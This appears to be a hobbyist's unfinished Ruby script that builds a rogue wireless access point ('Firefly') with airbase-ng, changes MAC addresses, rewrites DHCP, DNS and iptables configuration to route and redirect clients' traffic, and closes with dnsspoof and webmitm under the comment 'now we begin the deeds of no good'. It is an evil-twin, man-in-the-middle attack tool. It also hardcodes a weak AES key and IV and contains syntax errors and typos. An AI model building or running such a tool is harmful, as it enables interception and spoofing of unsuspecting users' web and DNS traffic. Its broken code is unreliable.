Untitled

#!/usr/bin/ruby
#capn-jack_mr_hai_signature_string
# this is a work in progress, im going to eventuall make a complete handler for wireless router .
# I started trying to make a WAP software in rub but after a while I started realizing that I shouldnt reinvent the wheel
# i should just make a really good car. Im going to incorporate a bit of C and python also, the C to speed it up and the python
#for some packet manipulation in the stream using scapy.
#The configurtation options are all constants, i figured that instead of asking each time (since people generally have a
#consistant setup) you set them in the code, the Class "packet_filter" is the filter (no really?!?!) i generally use nested ifs
# for the hueristics but you can do whatever here

#install script
#timed saves to pcap if ACTBAD, selective ports, most useful for tcp reconstruction
require 'socket'
require 'openssl'
#find alternatives to avahi and network manager
#maybe make a WAP connection script?
# iw? ifconfig? both !
#airodump to showcase the area, iwconfig to connect
#dhclient to get an IP


#ACL from ruby doc
# have it be invoked as a response to snort
#

#general config
KEY = "qwertyuiopasdfghjklzxcvbnmqwerty"
IV = "qwertyuiopasdfghjklzxcvbnmqwerty"
$ACTBAD=true
$VERBOSE = true
LOGGING= true
MONITOR="mon0"
EXTIF="eth1"
TUNNEL="at0"
INTIF="wlan1"
TTY="/dev/tty10"
CHAN = "9"
ESSID="Firefly"
`alias wpas='sudo killall -9 wpa_supplicant'`
`sudo killall -9 avahi-daemon `
#DHCP config
RANGE="192.168.1.2 192.168.1.254"
SCOPE="192.168.1.0"
GATEWAY="192.168.1.1"
MASK="255.255.255.0"
BROADCAST="192.168.1.255"
DOMAIN="cerberusrouter.net"
DNS1="208.67.222.222"
DNS2="208.67.220.220"


#Handles encryption
#example
#   #preparing my balls for encryption
#   balls = Encryption.new("balls")
#   #encrypting my balls
#   balls.encrypt_payload
class Encryption
    def initialize (string)
        @string = string
    end
    #encrypts
    def encrypt_payload
        cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
        cipher.encrypt
        cipher.key = WAPinit::KEY
        cipher.iv = WAPinit::IV
        cipher.update(@string) + cipher.final

    end
    #decrypts
    def decrypt_payload
        cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
        cipher.decrypt
        cipher.key = WAPinit::KEY
        cipher.iv = WAPinit::IV
        cipher.update(@string) + cipher.final
    end

end

#this is a socket client to tx/rx streamimg data.
class Socket_IO_cryptzz
  def initialize(data, port, host)
  @io_obj = data
  @port = port
  @host = host
  end
  def client
    socket = TCPSocket.open(host, port)
    while  = socket.gets


    end
    socket.close
  end

  def server
    server = TCPServer.open(@port)
    loop {
      client = server.accept
      data = Encryption.new(@io_obj)
      crypt_data = data.encrypt_payload
      client.puts crypt_data
      client.close
    }
end


class Http_server
  def initialize(port, header, max_connect, host,)
    @host = host #(insert php server self here)
  end

end


#instances of this class start the show
class WAPinit
`/etc/init.d/networking restart`
#file contents of the bind and DHCP servers and the interface file
interfaces = <<INTERFACE
#loopback interface
    auto lo iface lo inet loopback

    # interface external network (internet), configured through dhcp
    auto #{EXTIF}
    iface #{EXTIF} inet dhcp

    #interface network 1
    auto #{INTIF}
    iface #{INTIF} inet static
            address #{GATEWAWY}
            netmask #{MASK}
            network #{SCOPE}
            broadcast #{BROADCAST}


INTERFACE

bind = <<BIND
options {
    directory "/var/cache/bind";

    forwarders {
        #{GATEWAY};

    };

    auth-nxdomain no;    # conform to RFC1035
    listen-on-v6 { any; };
};
BIND


dhcp3 = <<DHCP
ddns-update-style interim;
ignore client-updates;

subnet #{SCOPE} netmask #{MASK} {

        range #{RANGE};
           option subnet-mask              #{MASK};    # Default subnet mask to be used by DHCP clients
           option broadcast-address        #{BROADCAST};    # Default broadcast address to be used by DHCP clients
           option routers                  #{GATEWAY};      # Default gateway to be used by DHCP clients
           option domain-name              "#{DOMAIN}";
           option domain-name-servers      #{DNS1}, #{DNS2};           # Default DNS to be used by DHCP clients
}
#         DHCP requests are not forwarded. Applies when there is more than one ethernet device and forwarding is configured.
#       option ipforwarding off;

         default-lease-time 21600;                            # Amount of time in seconds that a client may keep the IP address
        max-lease-time 43200;

        option time-offset              -18000;              # Eastern Standard Time
#       option ntp-servers              192.168.1.1;         # Default NTP server to be used by DHCP clients
DHCP
printf "\033[00;31m[SYSTEM]\033[00m   TTY output Being Directed to \033[00;31m#{TTY}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m External Interface: \033[00;31m#{EXTIF}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m Monitor Interface:  \033[00;31m #{MONITOR}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m Internal Interface: \033[00;31m#{INTIF}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m Tunnnel Interface:  \033[00;31m #{TUNNEL}\033[00m\n"
printf "\n\033[00;31m[SYSTEM]\033[00m Configuring Interfaces\n"
printf "\033[00;35m===============================================================\033[00m\n"
ifaces = File.open("/etc/network/interfaces", "w")
ifaces.syswrite(interfaces)
`route add -net -n #{SCOPE} netmask #{MASK} dev #{INTIF}`
`route add -net -n 0.0.0.0 dev #{EXTIF}`
printf `route`

printf "\033[00;35m===============================================================\033[00m\n"
printf "\033[00;31m[SYSTEM]\033[00m Interfaces Configured\n"

if `ifconfig`.match(/mon[0-9]/) = true
     printf "monitor mode previously enabled skipping"
   elsif `ifconfig`.match(/at[0-9]/) = true
     printf "WAP already active, skipping"
   elsif `ifconfig`.match(/wlan[0-9]/) = true
#     `sudo killall -9 NetworkManager`
     `sudo killall -9 avahi-daemon`
     `killall -9 wpa_supplicant`
     `airmon-ng start #{INTIF} #{CHAN}`
     `gnome-terminal -e airodump-ng #{MONITOR}`
     `changemac #{EXTIF}`
     `changemac #{INTIF}`
     printf "\033[00;31m[SYSTEM]\033[00m Monitor Mode Enabled on #{INTIF}  \n"
     printf "\033[00;31m[SYSTEM]\033[00mActivating Wireless Access Point \n"
     `killall -9 wpa_supplicant`
     pid = fork do
       `airbase-ng -e #{ESSID} -v -v -c #{CHAN} -I 5000 #{MONITOR} 2>&1`
     end
    Process.detach(pid)
   else printf "Something happened with the interfaces, please configure your system and plug in any devices"
  end
sleep 4
`ifconfig #{TUNNEL} up`
#begin the router-fu!
`modprobe ip_tables`
`modprobe iptable_filter`
`modprobe ip_conntrack`
`modprobe ip_conntrack_ftp`
`modprobe ip_conntrack_irc`
`modprobe iptable_nat`
`modprobe ip_nat_ftp`
`modprobe ip_nat_irc`

printf "\033[00;31m[SYSTEM]\033[00m Done loading modules\n"
printf "\033[00;31m[SYSTEM]\033[00m Enabling DynamicAddr\n"
`echo "1" > /proc/sys/net/ipv4/ip_dynaddr`

printf "\033[00;31m[SYSTEM]\033[00m Resetting IPTables Rules\n"
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --flush`
`iptables -P INPUT ACCEPT`
`iptables -F INPUT `
`iptables -P OUTPUT ACCEPT`
`iptables -F OUTPUT `
`iptables -P FORWARD DROP`
`iptables -F FORWARD `
`iptables -t nat -F`

printf "\n\033[00;31m[SYSTEM]\033[00m Configuring Routing Tables\n"
printf "\033[00;35m===============================================================\033[00m\n"

`iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -j ACCEPT`
`iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -m state --state ESTABLISHED,RELATED -j ACCEPT`
`iptables -A INPUT -i #{TUNNEL} -m state --state ESTABLISHED,RELATED -j ACCEPT`
`iptables -A INPUT -i lo -s 0/0 -d 0/0 -j ACCEPT`
`iptables -A POSTROUTING -t nat -o #{EXTIF} -j MASQUERADE`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to #{GATEWAY}` #dns
`iptables -t nat -A PREROUTING -i #{TUNNEL} -p tcp --dport 80 --j REDIRECT --to-ports 80`

`echo "1" > /proc/sys/net/ipv4/ip_forward`
printf "\033[00;35m===============================================================\033[00m\n"
printf "\033[00;31m[SYSTEM]\033[00m IPTables Configured\n"
printf "\n\033[00;31m[SYSTEM]\033[00m Configuring DHCP\n"
printf "\033[00;35m===============================================================\033[00m\n"
`ifconfig at0 up`
`ifconfig at0 #{GATEWAY} netmask #{MASK}`
`ifconfig at0 mtu 1500`
dhcpconf = File.open("/etc/dhcp3/dhcpd.conf", "w")
dhcpconf.syswrite(dhcp3)
`dhcpd3 #{TUNNEL}`
printf "\033[00;35m===============================================================\033[00m\n"
printf "\033[00;31m[SYSTEM]\033[00m DHCP Server Configured\n"
printf "\n\033[00;31m[SYSTEM]\033[00m Configuring DNS\n"
printf "\033[00;35m===============================================================\033[00m\n"
dnsf = File.open("/etc/bind/named.conf.options", "w")
dnsf.syswrite(bind)
printf `/etc/init.d/bind9 restart`
printf "\033[00;31m[SYSTEM]\033[00m DNS Caching Configured\n"
printf "\033[00;35m===============================================================\033[00m\n"
`notify-send "#{ESSID} - Wireless Access Point initialized"`
end

#Starting the server
WAPinit.new

# so far we have accomplished the task of initiating a WAP, starting DHCP, configuring the routing tables for
#tranparency and configuring the interfaces.

#now we begin the deeds of no good

`dnsspoof -i #{TUNNEL}`
sleep 1
`webmitm -d -d -d`
sleep 1